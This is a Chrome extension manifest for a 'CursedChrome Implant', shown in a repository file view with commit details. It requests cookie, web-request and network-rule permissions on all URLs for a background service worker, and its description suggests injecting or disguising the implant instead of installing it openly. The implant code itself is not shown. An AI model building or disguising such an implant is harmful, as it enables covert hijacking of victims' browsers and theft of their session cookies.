Files
mandatory e7e9c1a192 MV3 baby
2024-10-26 14:41:45 -04:00

26 lines
639 B
JSON
Executable File

{
"name": "CursedChrome Implant",
"version": "0.0.2",
"manifest_version": 3,
"description": "Example Chrome extension with implant code. You should probably inject/disguise the implant instead of installing this extension directly.",
"homepage_url": "https://thehackerblog.com",
"icons": {
"16": "icons/icon16.png",
"48": "icons/icon48.png",
"128": "icons/icon128.png"
},
"default_locale": "en",
"background": {
"service_worker": "src/bg/background.js"
},
"permissions": [
"webRequest",
"cookies",
"storage",
"declarativeNetRequest"
],
"host_permissions": [
"<all_urls>"
]
}